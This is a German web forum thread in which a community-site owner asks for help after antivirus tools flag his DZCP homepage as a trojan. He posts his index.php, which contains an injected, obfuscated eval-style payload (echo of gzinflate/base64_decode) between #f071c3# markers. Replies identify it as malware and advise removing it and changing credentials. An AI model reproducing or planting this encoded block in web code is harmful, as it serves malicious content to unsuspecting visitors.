hallo,

ich kann davon ausgehen das unsere Communitypage gehackt worden ist. Wie und wo versuche ich gerade rauszufinden. Auf jedenfall wird Usern die ihr System mit Kaspersky schützen eine Trojaner- Warnung ausgegeben sobald sie unsere Page besuchen. Mir selber geht es gleich und um die Systeme unsere User/Besucher zu schützen hab ich unsere Page vorerst vom Netz genommen via Hostingservice.

ich hab jetzt ne weile rumgegoogelt und so einiges in Erfahrung bringen können. Was mir aber gleich von Anfang an aufgefallen ist, ist das die Warnung nur kommt wenn man nur die Domain allein in den browser eingibt. Also bei http://www.meinesite.de. Hänge ich nun aber .../news daran kommt sie nicht. Kann vielleicht hilfreich sein bei Fehlersuche.

Mir ist auch aufgefallen das ich zwar die Aktuelle Version 1.5.5.4 verwende, doch den Fix von 1.5.5.1 zu 1.5.5.2 garnicht richtig gemacht habe. daher bestimmt auch den vielen Traffic auf unser Gästebuch.

Ich hab in meinen Dateien nach Fremdcode geschaut und mir ist in der index.php sofort was aufgefallen. Ich kann mich auch nicht entsinnen jemals bei einem Addon oder einer Modi die index.php angerührt zu haben. Hier mal die index.php:

<?php
ob_start();
  define(basePath, dirname(__FILE__));

    require_once(basePath."/inc/mysql.php");
   
    if(empty($sql_user) && empty($sql_pass) && empty($sql_db)) {
        header('Location: _installer/index.php');
    }    else {
        include(basePath."/inc/config.php");
        include(basePath."/inc/bbcode.php");
       
        header('Location: '.(empty($_COOKIE[$prev.'id']) && empty($_COOKIE[$prev.'pwd']) ? 'news/' : 'user/?action=userlobby'));
    }

ob_end_flush();

#f071c3#
echo(gzinflate(base64_decode("zVZbb5swFP4t

gwegiDQ2Npe5bA/RfsEeozykCRSqNARwWy1R//t

8fKEkbVJWbdIkLub4nPOdO77pVm214994++vQZOt69fiQb/lk1eZLnv/Y5PDlWuvqyfJYM1nudvl2PSurzdptfEvQXlZLvird

5tk7lFkwRfiashdQtmtrXvNfu9yw3Lb5besdOp795

G21vWP7feYsN45875+cSfd42/HWRTgMEMaev9+

zrsvmC1ZkTtE6vlM/iMesdFjhC8l2phbNXb3Onbmlx

K2FSwLsseeMl1XH8ux5Xgz2EAK9C7bNrHBCbbgpgs

fURtRGqU1SmxJBIAlQY3gAE0lhRQTFxlhw96TYDqW

SUH+fMNMIUIQEkAiyidQI4mGiP3oJgY4SCa1NSJWYJCK

pAMhYQFFDiUAV1Z6cekSjUwhBARRY4uREMgIpZBhDZboy7

AzOuFglClcZFb+6Gtk4vWAqosoC2AEVuA8FRTKy4gIvBAbs

YhNXkxaAjLQTsTJWvoVJyl5i4FR8qbYUacdiwHkFxaEKfc+MNBIywMqs

CxKRNiwd1MvAq0TrinorDCXsg0dV5iSWNlReKuAqpca1Xo90pfc

Y2HREEs1ENEg8yJDSZap6Kl1LwB21EWspOqRKP8Ip5FXl42xyBR

OKLtXhkCDRlekkeccfNLLi3+8V04aR1CPHAE5NJ4yob6LrW1LJM

IQXB4Np9gsN0Le9CtFUdlM0nDwmu3HfYJDT+KTRkslJK6nyRP+

ym94z+03t4z8p+qP2f1v7yqcRiB+3R4/0cZeMRj1upMGMGK9i0H

Ifyn+mQt5Ov6M6OR5nf6ssz0zRUcif+hv9D39uaJpYj+pXTCEU4

kF9S8NANQyls5PSmrtu7n23OuurOI751s7yrU3FxVHHWtr95qPeN

acgz2NF3bpVFgU4QHCzKqAk/ZJNWeX73uE+q1hVuB33xBGs6/yO

T4q2fpiV4tgljltugK7KKxf56Go7v18IdS+NYGO524jlzbU+VP4G")));
#/f071c3#
?>

Der farblich abgesetzte Teil macht mir Sorgen. Meine Frage ist jetzt ob dieser Code vielleicht doch zu einem Addon/Mod gehören kann oder ob dieser schon ein Teil Fremdcode ist welcher nicht ins DZCP reingehört?

Vielleicht hat ja auch einer nen anderen Rat zum Thema.

Gruss Meins2

 GTLeague ist die einzig wahre Gran Turismo Community.
Alle anderen sind nur sinnlose Versuche zu einer zu werden.

Das es nur auf der Hauptseite auftritt ist klar, da ja nur die index.php im root Ordner geändert wurde ....

Dieses Ding stammt zu 99% von keinem Mod. Mein Virenprogramm schlägt auch sofort Alarm (Avast) und lässt mich nichtmal den Code untersuchen .... Werde das gleich in einer VM mal testen ...

Soweit wie ich es sehe ist es zwar Schadcode,

aber nicht so schlimm wie es sein könnte ...

ENTFERNE DIES UNBEDINGT !!!

Ändere am besten FTP-Daten und überprüfe ob deine buffer.php aktuell ist ...

Schau auch mal im Log nach, wer diese Datei abgeändert hat ...

Ich danke für die schnelle Hilfe. Hab jetzt Passwörter, DZCP Fixes und den Code aus den php- Datein gelöscht. Kaspersky meckert auch nicht mehr rumm, das beruhigt mich ein wenig.

Danke Nochmal

 GTLeague ist die einzig wahre Gran Turismo Community.
Alle anderen sind nur sinnlose Versuche zu einer zu werden.